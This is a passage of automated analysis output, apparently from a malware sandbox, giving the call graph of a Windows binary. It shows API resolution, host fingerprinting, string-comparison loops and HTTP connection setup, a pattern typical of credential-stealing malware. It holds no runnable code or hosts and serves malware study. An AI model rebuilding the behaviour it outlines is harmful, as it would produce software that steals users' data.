calls 26904->27903 26907 401590 lstrcpy 26905->26907 26908 416310 26907->26908 27906 405960 39 API calls ctype 26908->27906 26910 41631c 26912 416338 26910->26912 27907 416630 9 API calls ctype 26910->27907 26912->26569 26914 404697 26913->26914 26915 4046ac 11 API calls 26914->26915 26916 40474f 6 API calls 26914->26916 26915->26914 26916->26573 26917->26660 26920 4010c2 ctype 26918->26920 26919 4010fd 26919->26690 26920->26919 26921 4010e2 VirtualFree 26920->26921 26921->26919 26923 401233 GlobalMemoryStatusEx 26922->26923 26923->26693 26924->26706 26926 41a7c2 26925->26926 26927 41a7ec 26926->26927 26928 41a7da lstrcpy 26926->26928 26927->26711 26928->26927 26930 41a740 lstrcpy 26929->26930 26931 416833 26930->26931 26932 41a9b0 4 API calls 26931->26932 26933 416845 26932->26933 26934 41a8a0 lstrcpy 26933->26934 26935 41684e 26934->26935 26936 41a9b0 4 API calls 26935->26936 26937 416867 26936->26937 26938 41a8a0 lstrcpy 26937->26938 26939 416870 26938->26939 26940 41a9b0 4 API calls 26939->26940 26941 41688a 26940->26941 26942 41a8a0 lstrcpy 26941->26942 26943 416893 26942->26943 26944 41a9b0 4 API calls 26943->26944 26945 4168ac 26944->26945 26946 41a8a0 lstrcpy 26945->26946 26947 4168b5 26946->26947 26948 41a9b0 4 API calls 26947->26948 26949 4168cf 26948->26949 26950 41a8a0 lstrcpy 26949->26950 26951 4168d8 26950->26951 26952 41a9b0 4 API calls 26951->26952 26953 4168f3 26952->26953 26954 41a8a0 lstrcpy 26953->26954 26955 4168fc 26954->26955 26956 41a7a0 lstrcpy 26955->26956 26957 416910 26956->26957 26957->26718 26959 41a812 26958->26959 26959->26721 26961 41a83f 26960->26961 26962 415b54 26961->26962 26963 41a87b lstrcpy 26961->26963 26962->26731 26963->26962 26965 41a8a0 lstrcpy 26964->26965 26966 416443 26965->26966 26967 41a8a0 lstrcpy 26966->26967 26968 416455 26967->26968 26969 41a8a0 lstrcpy 26968->26969 26970 416467 26969->26970 26971 41a8a0 lstrcpy 26970->26971 26972 415b86 26971->26972 26972->26737 26974 4045c0 34 API calls 26973->26974 26975 4026b4 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 4026d7 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 4026f0 26978->26979 26980 4045c0 34 API calls 26979->26980 26981 402709 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 402736 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 40274f 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 402768 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 402795 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 4027ae 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 4027c7 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 4027e0 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 4027f9 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 402812 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 40282b 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 402844 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 40285d 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 402876 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 40288f 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 4028a8 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 4028c1 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 4028da 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 4028f3 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 40290c 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 402925 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 40293e 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 402957 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 402970 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 402989 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 4029a2 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 4029bb 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 4029d4 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 4029ed 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 402a06 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 402a1f 27040->27041 27042 4045c0 34 API calls 27041->27042 27043 402a38 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 402a51 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 402a6a 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 402a83 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 402a9c 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 402ab5 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 402ace 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 402ae7 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 402b00 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 402b19 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 402b32 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 402b4b 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 402b64 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 402b7d 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 402b96 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 402baf 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 402bc8 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 402be1 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 402bfa 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 402c13 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 402c2c 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 402c45 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 402c5e 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 402c77 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 402c90 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 402ca9 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 402cc2 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 402cdb 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 402cf4 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 402d0d 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 402d26 27102->27103 27104 4045c0 34 API calls 27103->27104 27105 402d3f 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 402d58 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 402d71 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 402d8a 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 402da3 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 402dbc 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 402dd5 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 402dee 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 402e07 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 402e20 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 402e39 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 402e52 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 402e6b 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 402e84 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 402e9d 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 402eb6 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 402ecf 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 402ee8 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 402f01 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 402f1a 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 402f33 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 402f4c 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 402f65 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 402f7e 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 402f97 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 402fb0 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 402fc9 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 402fe2 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 402ffb 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 403014 27162->27163 27164 4045c0 34 API calls 27163->27164 27165 40302d 27164->27165 27166 4045c0 34 API calls 27165->27166 27167 403046 27166->27167 27168 4045c0 34 API calls 27167->27168 27169 40305f 27168->27169 27170 4045c0 34 API calls 27169->27170 27171 403078 27170->27171 27172 4045c0 34 API calls 27171->27172 27173 403091 27172->27173 27174 4045c0 34 API calls 27173->27174 27175 4030aa 27174->27175 27176 4045c0 34 API calls 27175->27176 27177 4030c3 27176->27177 27178 4045c0 34 API calls 27177->27178 27179 4030dc 27178->27179 27180 4045c0 34 API calls 27179->27180 27181 4030f5 27180->27181 27182 4045c0 34 API calls 27181->27182 27183 40310e 27182->27183 27184 4045c0 34 API calls 27183->27184 27185 403127 27184->27185 27186 4045c0 34 API calls 27185->27186 27187 403140 27186->27187 27188 4045c0 34 API calls 27187->27188 27189 403159 27188->27189 27190 4045c0 34 API calls 27189->27190 27191 403172 27190->27191 27192 4045c0 34 API calls 27191->27192 27193 40318b 27192->27193 27194 4045c0 34 API calls 27193->27194 27195 4031a4 27194->27195 27196 4045c0 34 API calls 27195->27196 27197 4031bd 27196->27197 27198 4045c0 34 API calls 27197->27198 27199 4031d6 27198->27199 27200 4045c0 34 API calls 27199->27200 27201 4031ef 27200->27201 27202 4045c0 34 API calls 27201->27202 27203 403208 27202->27203 27204 4045c0 34 API calls 27203->27204 27205 403221 27204->27205 27206 4045c0 34 API calls 27205->27206 27207 40323a 27206->27207 27208 4045c0 34 API calls 27207->27208 27209 403253 27208->27209 27210 4045c0 34 API calls 27209->27210 27211 40326c 27210->27211 27212 4045c0 34 API calls 27211->27212 27213 403285 27212->27213 27214 4045c0 34 API calls 27213->27214 27215 40329e 27214->27215 27216 4045c0 34 API calls 27215->27216 27217 4032b7 27216->27217 27218 4045c0 34 API calls 27217->27218 27219 4032d0 27218->27219 27220 4045c0 34 API calls 27219->27220 27221 4032e9 27220->27221 27222 4045c0 34 API calls 27221->27222 27223 403302 27222->27223 27224 4045c0 34 API calls 27223->27224 27225 40331b 27224->27225 27226 4045c0 34 API calls 27225->27226 27227 403334 27226->27227 27228 4045c0 34 API calls 27227->27228 27229 40334d 27228->27229 27230 4045c0 34 API calls 27229->27230 27231 403366 27230->27231 27232 4045c0 34 API calls 27231->27232 27233 40337f 27232->27233 27234 4045c0 34 API calls 27233->27234 27235 403398 27234->27235 27236 4045c0 34 API calls 27235->27236 27237 4033b1 27236->27237 27238 4045c0 34 API calls 27237->27238 27239 4033ca 27238->27239 27240 4045c0 34 API calls 27239->27240 27241 4033e3 27240->27241 27242 4045c0 34 API calls 27241->27242 27243 4033fc 27242->27243 27244 4045c0 34 API calls 27243->27244 27245 403415 27244->27245 27246 4045c0 34 API calls 27245->27246 27247 40342e 27246->27247 27248 4045c0 34 API calls 27247->27248 27249 403447 27248->27249 27250 4045c0 34 API calls 27249->27250 27251 403460 27250->27251 27252 4045c0 34 API calls 27251->27252 27253 403479 27252->27253 27254 4045c0 34 API calls 27253->27254 27255 403492 27254->27255 27256 4045c0 34 API calls 27255->27256 27257 4034ab 27256->27257 27258 4045c0 34 API calls 27257->27258 27259 4034c4 27258->27259 27260 4045c0 34 API calls 27259->27260 27261 4034dd 27260->27261 27262 4045c0 34 API calls 27261->27262 27263 4034f6 27262->27263 27264 4045c0 34 API calls 27263->27264 27265 40350f 27264->27265 27266 4045c0 34 API calls 27265->27266 27267 403528 27266->27267 27268 4045c0 34 API calls 27267->27268 27269 403541 27268->27269 27270 4045c0 34 API calls 27269->27270 27271 40355a 27270->27271 27272 4045c0 34 API calls 27271->27272 27273 403573 27272->27273 27274 4045c0 34 API calls 27273->27274 27275 40358c 27274->27275 27276 4045c0 34 API calls 27275->27276 27277 4035a5 27276->27277 27278 4045c0 34 API calls 27277->27278 27279 4035be 27278->27279 27280 4045c0 34 API calls 27279->27280 27281 4035d7 27280->27281 27282 4045c0 34 API calls 27281->27282 27283 4035f0 27282->27283 27284 4045c0 34 API calls 27283->27284 27285 403609 27284->27285 27286 4045c0 34 API calls 27285->27286 27287 403622 27286->27287 27288 4045c0 34 API calls 27287->27288 27289 40363b 27288->27289 27290 4045c0 34 API calls 27289->27290 27291 403654 27290->27291 27292 4045c0 34 API calls 27291->27292 27293 40366d 27292->27293 27294 4045c0 34 API calls 27293->27294 27295 403686 27294->27295 27296 4045c0 34 API calls 27295->27296 27297 40369f 27296->27297 27298 4045c0 34 API calls 27297->27298 27299 4036b8 27298->27299 27300 4045c0 34 API calls 27299->27300 27301 4036d1 27300->27301 27302 4045c0 34 API calls 27301->27302 27303 4036ea 27302->27303 27304 4045c0 34 API calls 27303->27304 27305 403703 27304->27305 27306 4045c0 34 API calls 27305->27306 27307 40371c 27306->27307 27308 4045c0 34 API calls 27307->27308 27309 403735 27308->27309 27310 4045c0 34 API calls 27309->27310 27311 40374e 27310->27311 27312 4045c0 34 API calls 27311->27312 27313 403767 27312->27313 27314 4045c0 34 API calls 27313->27314 27315 403780 27314->27315 27316 4045c0 34 API calls 27315->27316 27317 403799 27316->27317 27318 4045c0 34 API calls 27317->27318 27319 4037b2 27318->27319 27320 4045c0 34 API calls 27319->27320 27321 4037cb 27320->27321 27322 4045c0 34 API calls 27321->27322 27323 4037e4 27322->27323 27324 4045c0 34 API calls 27323->27324 27325 4037fd 27324->27325 27326 4045c0 34 API calls 27325->27326 27327 403816 27326->27327 27328 4045c0 34 API calls 27327->27328 27329 40382f 27328->27329 27330 4045c0 34 API calls 27329->27330 27331 403848 27330->27331 27332 4045c0 34 API calls 27331->27332 27333 403861 27332->27333 27334 4045c0 34 API calls 27333->27334 27335 40387a 27334->27335 27336 4045c0 34 API calls 27335->27336 27337 403893 27336->27337 27338 4045c0 34 API calls 27337->27338 27339 4038ac 27338->27339 27340 4045c0 34 API calls 27339->27340 27341 4038c5 27340->27341 27342 4045c0 34 API calls 27341->27342 27343 4038de 27342->27343 27344 4045c0 34 API calls 27343->27344 27345 4038f7 27344->27345 27346 4045c0 34 API calls 27345->27346 27347 403910 27346->27347 27348 4045c0 34 API calls 27347->27348 27349 403929 27348->27349 27350 4045c0 34 API calls 27349->27350 27351 403942 27350->27351 27352 4045c0 34 API calls 27351->27352 27353 40395b 27352->27353 27354 4045c0 34 API calls 27353->27354 27355 403974 27354->27355 27356 4045c0 34 API calls 27355->27356 27357 40398d 27356->27357 27358 4045c0 34 API calls 27357->27358 27359 4039a6 27358->27359 27360 4045c0 34 API calls 27359->27360 27361 4039bf 27360->27361 27362 4045c0 34 API calls 27361->27362 27363 4039d8 27362->27363 27364 4045c0 34 API calls 27363->27364 27365 4039f1 27364->27365 27366 4045c0 34 API calls 27365->27366 27367 403a0a 27366->27367 27368 4045c0 34 API calls 27367->27368 27369 403a23 27368->27369 27370 4045c0 34 API calls 27369->27370 27371 403a3c 27370->27371 27372 4045c0 34 API calls 27371->27372 27373 403a55 27372->27373 27374 4045c0 34 API calls 27373->27374 27375 403a6e 27374->27375 27376 4045c0 34 API calls 27375->27376 27377 403a87 27376->27377 27378 4045c0 34 API calls 27377->27378 27379 403aa0 27378->27379 27380 4045c0 34 API calls 27379->27380 27381 403ab9 27380->27381 27382 4045c0 34 API calls 27381->27382 27383 403ad2 27382->27383 27384 4045c0 34 API calls 27383->27384 27385 403aeb 27384->27385 27386 4045c0 34 API calls 27385->27386 27387 403b04 27386->27387 27388 4045c0 34 API calls 27387->27388 27389 403b1d 27388->27389 27390 4045c0 34 API calls 27389->27390 27391 403b36 27390->27391 27392 4045c0 34 API calls 27391->27392 27393 403b4f 27392->27393 27394 4045c0 34 API calls 27393->27394 27395 403b68 27394->27395 27396 4045c0 34 API calls 27395->27396 27397 403b81 27396->27397 27398 4045c0 34 API calls 27397->27398 27399 403b9a 27398->27399 27400 4045c0 34 API calls 27399->27400 27401 403bb3 27400->27401 27402 4045c0 34 API calls 27401->27402 27403 403bcc 27402->27403 27404 4045c0 34 API calls 27403->27404 27405 403be5 27404->27405 27406 4045c0 34 API calls 27405->27406 27407 403bfe 27406->27407 27408 4045c0 34 API calls 27407->27408 27409 403c17 27408->27409 27410 4045c0 34 API calls 27409->27410 27411 403c30 27410->27411 27412 4045c0 34 API calls 27411->27412 27413 403c49 27412->27413 27414 4045c0 34 API calls 27413->27414 27415 403c62 27414->27415 27416 4045c0 34 API calls 27415->27416 27417 403c7b 27416->27417 27418 4045c0 34 API calls 27417->27418 27419 403c94 27418->27419 27420 4045c0 34 API calls 27419->27420 27421 403cad 27420->27421 27422 4045c0 34 API calls 27421->27422 27423 403cc6 27422->27423 27424 4045c0 34 API calls 27423->27424 27425 403cdf 27424->27425 27426 4045c0 34 API calls 27425->27426 27427 403cf8 27426->27427 27428 4045c0 34 API calls 27427->27428 27429 403d11 27428->27429 27430 4045c0 34 API calls 27429->27430 27431 403d2a 27430->27431 27432 4045c0 34 API calls 27431->27432 27433 403d43 27432->27433 27434 4045c0 34 API calls 27433->27434 27435 403d5c 27434->27435 27436 4045c0 34 API calls 27435->27436 27437 403d75 27436->27437 27438 4045c0 34 API calls 27437->27438 27439 403d8e 27438->27439 27440 4045c0 34 API calls 27439->27440 27441 403da7 27440->27441 27442 4045c0 34 API calls 27441->27442 27443 403dc0 27442->27443 27444 4045c0 34 API calls 27443->27444 27445 403dd9 27444->27445 27446 4045c0 34 API calls 27445->27446 27447 403df2 27446->27447 27448 4045c0 34 API calls 27447->27448 27449 403e0b 27448->27449 27450 4045c0 34 API calls 27449->27450 27451 403e24 27450->27451 27452 4045c0 34 API calls 27451->27452 27453 403e3d 27452->27453 27454 4045c0 34 API calls 27453->27454 27455 403e56 27454->27455 27456 4045c0 34 API calls 27455->27456 27457 403e6f 27456->27457 27458 4045c0 34 API calls 27457->27458 27459 403e88 27458->27459 27460 4045c0 34 API calls 27459->27460 27461 403ea1 27460->27461 27462 4045c0 34 API calls 27461->27462 27463 403eba 27462->27463 27464 4045c0 34 API calls 27463->27464 27465 403ed3 27464->27465 27466 4045c0 34 API calls 27465->27466 27467 403eec 27466->27467 27468 4045c0 34 API calls 27467->27468 27469 403f05 27468->27469 27470 4045c0 34 API calls 27469->27470 27471 403f1e 27470->27471 27472 4045c0 34 API calls 27471->27472 27473 403f37 27472->27473 27474 4045c0 34 API calls 27473->27474 27475 403f50 27474->27475 27476 4045c0 34 API calls 27475->27476 27477 403f69 27476->27477 27478 4045c0 34 API calls 27477->27478 27479 403f82 27478->27479 27480 4045c0 34 API calls 27479->27480 27481 403f9b 27480->27481 27482 4045c0 34 API calls 27481->27482 27483 403fb4 27482->27483 27484 4045c0 34 API calls 27483->27484 27485 403fcd 27484->27485 27486 4045c0 34 API calls 27485->27486 27487 403fe6 27486->27487 27488 4045c0 34 API calls 27487->27488 27489 403fff 27488->27489 27490 4045c0 34 API calls 27489->27490 27491 404018 27490->27491 27492 4045c0 34 API calls 27491->27492 27493 404031 27492->27493 27494 4045c0 34 API calls 27493->27494 27495 40404a 27494->27495 27496 4045c0 34 API calls 27495->27496 27497 404063 27496->27497 27498 4045c0 34 API calls 27497->27498 27499 40407c 27498->27499 27500 4045c0 34 API calls 27499->27500 27501 404095 27500->27501 27502 4045c0 34 API calls 27501->27502 27503 4040ae 27502->27503 27504 4045c0 34 API calls 27503->27504 27505 4040c7 27504->27505 27506 4045c0 34 API calls 27505->27506 27507 4040e0 27506->27507 27508 4045c0 34 API calls 27507->27508 27509 4040f9 27508->27509 27510 4045c0 34 API calls 27509->27510 27511 404112 27510->27511 27512 4045c0 34 API calls 27511->27512 27513 40412b 27512->27513 27514 4045c0 34 API calls 27513->27514 27515 404144 27514->27515 27516 4045c0 34 API calls 27515->27516 27517 40415d 27516->27517 27518 4045c0 34 API calls 27517->27518 27519 404176 27518->27519 27520 4045c0 34 API calls 27519->27520 27521 40418f 27520->27521 27522 4045c0 34 API calls 27521->27522 27523 4041a8 27522->27523 27524 4045c0 34 API calls 27523->27524 27525 4041c1 27524->27525 27526 4045c0 34 API calls 27525->27526 27527 4041da 27526->27527 27528 4045c0 34 API calls 27527->27528 27529 4041f3 27528->27529 27530 4045c0 34 API calls 27529->27530 27531 40420c 27530->27531 27532 4045c0 34 API calls 27531->27532 27533 404225 27532->27533 27534 4045c0 34 API calls 27533->27534 27535 40423e 27534->27535 27536 4045c0 34 API calls 27535->27536 27537 404257 27536->27537 27538 4045c0 34 API calls 27537->27538 27539 404270 27538->27539 27540 4045c0 34 API calls 27539->27540 27541 404289 27540->27541 27542 4045c0 34 API calls 27541->27542 27543 4042a2 27542->27543 27544 4045c0 34 API calls 27543->27544 27545 4042bb 27544->27545 27546 4045c0 34 API calls 27545->27546 27547 4042d4 27546->27547 27548 4045c0 34 API calls 27547->27548 27549 4042ed 27548->27549 27550 4045c0 34 API calls 27549->27550 27551 404306 27550->27551 27552 4045c0 34 API calls 27551->27552 27553 40431f 27552->27553 27554 4045c0 34 API calls 27553->27554 27555 404338 27554->27555 27556 4045c0 34 API calls 27555->27556 27557 404351 27556->27557 27558 4045c0 34 API calls 27557->27558 27559 40436a 27558->27559 27560 4045c0 34 API calls 27559->27560 27561 404383 27560->27561 27562 4045c0 34 API calls 27561->27562 27563 40439c 27562->27563 27564 4045c0 34 API calls 27563->27564 27565 4043b5 27564->27565 27566 4045c0 34 API calls 27565->27566 27567 4043ce 27566->27567 27568 4045c0 34 API calls 27567->27568 27569 4043e7 27568->27569 27570 4045c0 34 API calls 27569->27570 27571 404400 27570->27571 27572 4045c0 34 API calls 27571->27572 27573 404419 27572->27573 27574 4045c0 34 API calls 27573->27574 27575 404432 27574->27575 27576 4045c0 34 API calls 27575->27576 27577 40444b 27576->27577 27578 4045c0 34 API calls 27577->27578 27579 404464 27578->27579 27580 4045c0 34 API calls 27579->27580 27581 40447d 27580->27581 27582 4045c0 34 API calls 27581->27582 27583 404496 27582->27583 27584 4045c0 34 API calls 27583->27584 27585 4044af 27584->27585 27586 4045c0 34 API calls 27585->27586 27587 4044c8 27586->27587 27588 4045c0 34 API calls 27587->27588 27589 4044e1 27588->27589 27590 4045c0 34 API calls 27589->27590 27591 4044fa 27590->27591 27592 4045c0 34 API calls 27591->27592 27593 404513 27592->27593 27594 4045c0 34 API calls 27593->27594 27595 40452c 27594->27595 27596 4045c0 34 API calls 27595->27596 27597 404545 27596->27597 27598 4045c0 34 API calls 27597->27598 27599 40455e 27598->27599 27600 4045c0 34 API calls 27599->27600 27601 404577 27600->27601 27602 4045c0 34 API calls 27601->27602 27603 404590 27602->27603 27604 4045c0 34 API calls 27603->27604 27605 4045a9 27604->27605 27606 419c10 27605->27606 27607 419c20 43 API calls 27606->27607 27608 41a036 8 API calls 27606->27608 27607->27608 27609 41a146 27608->27609 27610 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27608->27610 27611 41a153 8 API calls 27609->27611 27612 41a216 27609->27612 27610->27609 27611->27612 27613 41a298 27612->27613 27614 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27612->27614 27615 41a2a5 6 API calls 27613->27615 27616 41a337 27613->27616 27614->27613 27615->27616 27617 41a344 9 API calls 27616->27617 27618 41a41f 27616->27618 27617->27618 27619 41a4a2 27618->27619 27620 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27618->27620 27621 41a4ab GetProcAddress GetProcAddress 27619->27621 27622 41a4dc 27619->27622 27620->27619 27621->27622 27623 41a515 27622->27623 27624 41a4e5 GetProcAddress GetProcAddress 27622->27624 27625 41a612 27623->27625 27626 41a522 10 API calls 27623->27626 27624->27623 27627 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27625->27627 27628 41a67d 27625->27628 27626->27625 27627->27628 27629 41a686 GetProcAddress 27628->27629 27630 41a69e 27628->27630 27629->27630 27631 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27630->27631 27632 415ca3 27630->27632 27631->27632 27633 401590 27632->27633 27908 401670 27633->27908 27636 41a7a0 lstrcpy 27637 4015b5 27636->27637 27638 41a7a0 lstrcpy 27637->27638 27639 4015c7 27638->27639 27640 41a7a0 lstrcpy 27639->27640 27641 4015d9 27640->27641 27642 41a7a0 lstrcpy 27641->27642 27643 401663 27642->27643 27644 415510 27643->27644 27645 415521 27644->27645 27646 41a820 2 API calls 27645->27646 27647 41552e 27646->27647 27648 41a820 2 API calls 27647->27648 27649 41553b 27648->27649 27650 41a820 2 API calls 27649->27650 27651 415548 27650->27651 27652 41a740 lstrcpy 27651->27652 27653 415555 27652->27653 27654 41a740 lstrcpy 27653->27654 27655 415562 27654->27655 27656 41a740 lstrcpy 27655->27656 27657 41556f 27656->27657 27658 41a740 lstrcpy 27657->27658 27698 41557c 27658->27698 27659 41a7a0 lstrcpy 27659->27698 27660 415643 StrCmpCA 27660->27698 27661 4156a0 StrCmpCA 27662 4157dc 27661->27662 27661->27698 27663 41a8a0 lstrcpy 27662->27663 27664 4157e8 27663->27664 27666 41a820 2 API calls 27664->27666 27665 41a820 lstrlenA lstrcpy 27665->27698 27668 4157f6 27666->27668 27667 415856 StrCmpCA 27670 415991 27667->27670 27667->27698 27669 41a820 2 API calls 27668->27669 27672 415805 27669->27672 27673 41a8a0 lstrcpy 27670->27673 27671 41a740 lstrcpy 27671->27698 27674 401670 lstrcpy 27672->27674 27676 41599d 27673->27676 27697 415811 27674->27697 27675 401590 lstrcpy 27675->27698 27677 41a820 2 API calls 27676->27677 27678 4159ab 27677->27678 27681 41a820 2 API calls 27678->27681 27679 415a0b StrCmpCA 27682 415a16 Sleep 27679->27682 27683 415a28 27679->27683 27680 4152c0 29 API calls 27680->27698 27684 4159ba 27681->27684 27682->27698 27685 41a8a0 lstrcpy 27683->27685 27687 401670 lstrcpy 27684->27687 27688 415a34 27685->27688 27686 41a8a0 lstrcpy 27686->27698 27687->27697 27689 41a820 2 API calls 27688->27689 27690 415a43 27689->27690 27691 41a820 2 API calls 27690->27691 27692 415a52 27691->27692 27694 401670 lstrcpy 27692->27694 27693 41578a StrCmpCA 27693->27698 27694->27697 27695 41593f StrCmpCA 27695->27698 27696 4151f0 23 API calls 27696->27698 27697->26752 27698->27659 27698->27660 27698->27661 27698->27665 27698->27667 27698->27671 27698->27675 27698->27679 27698->27680 27698->27686 27698->27693 27698->27695 27698->27696 27700 417553 GetVolumeInformationA 27699->27700 27701 41754c 27699->27701 27702 417591 27700->27702 27701->27700 27703 4175fc GetProcessHeap HeapAlloc 27702->27703 27704 417619 27703->27704 27705 417628 wsprintfA 27703->27705 27706 41a740 lstrcpy 27704->27706 27707 41a740 lstrcpy 27705->27707 27708 415da7 27706->27708 27707->27708 27708->26773 27710 41a7a0 lstrcpy 27709->27710 27711 404899 27710->27711 27917 4047b0 27711->27917 27713 4048a5 27714 41a740 lstrcpy 27713->27714 27715 4048d7 27714->27715 27716 41a740 lstrcpy 27715->27716 27717 4048e4 27716->27717 27718 41a740 lstrcpy 27717->27718 27719 4048f1 27718->27719 27720 41a740 lstrcpy 27719->27720 27721 4048fe 27720->27721 27722 41a740 lstrcpy 27721->27722 27723 40490b InternetOpenA StrCmpCA 27722->27723 27724 404944 27723->27724 27725 404955 27724->27725 27726 404ecb InternetCloseHandle 27724->27726 27930 418b60 GetSystemTime lstrcpy lstrcpy 27725->27930 27728 404ee8 27726->27728 27925 409ac0 CryptStringToBinaryA 27728->27925 27729 404963 27931 41a920 lstrcpy lstrcpy lstrcatA 27729->27931 27733 404976 27734 41a8a0 lstrcpy 27733->27734 27739 40497f 27734->27739 27735 41a820 2 API calls 27736 404f05 27735->27736 27737 41a9b0 4 API calls 27736->27737 27740 404f1b 27737->27740 27738 404f27 ctype 27742 41a7a0 lstrcpy 27738->27742 27743 41a9b0 4 API calls 27739->27743 27741 41a8a0 lstrcpy 27740->27741 27741->27738 27755 404f57 27742->27755 27744 4049a9 27743->27744 27745 41a8a0 lstrcpy 27744->27745 27746 4049b2 27745->27746 27747 41a9b0 4 API calls 27746->27747 27748 4049d1 27747->27748 27749 41a8a0 lstrcpy 27748->27749 27750 4049da 27749->27750 27932 41a920 lstrcpy lstrcpy lstrcatA 27750->27932 27752 4049f8 27753 41a8a0 lstrcpy 27752->27753 27754 404a01 27753->27754 27756 41a9b0 4 API calls 27754->27756 27755->26776 27757 404a20 27756->27757 27758 41a8a0 lstrcpy 27757->27758 27759 404a29 27758->27759 27760 41a9b0 4 API calls 27759->27760 27761 404a48 27760->27761 27762 41a8a0 lstrcpy 27761->27762 27763 404a51 27762->27763 27764 41a9b0 4 API calls 27763->27764 27765 404a7d 27764->27765 27933 41a920 lstrcpy lstrcpy lstrcatA 27765->27933 27767 404a84 27768 41a8a0 lstrcpy 27767->27768 27769 404a8d 27768->27769 27770 404aa3 InternetConnectA 27769->27770 27770->27726 27771 404ad3 HttpOpenRequestA 27770->27771 27773 404b28 27771->27773 27774 404ebe InternetCloseHandle 27771->27774 27775 41a9b0 4 API calls 27773->27775 27774->27726 27776 404b3c 27775->27776 27777 41a8a0 lstrcpy 27776->27777 27778 404b45 27777->27778 27934 41a920 lstrcpy lstrcpy lstrcatA 27778->27934 27780 404b63 27781 41a8a0 lstrcpy 27780->27781 27782 404b6c 27781->27782 27783 41a9b0 4 API calls 27782->27783 27784 404b8b 27783->27784 27785 41a8a0 lstrcpy 27784->27785 27786 404b94 27785->27786 27787 41a9b0 4 API calls 27786->27787 27788 404bb5 27787->27788 27789 41a8a0 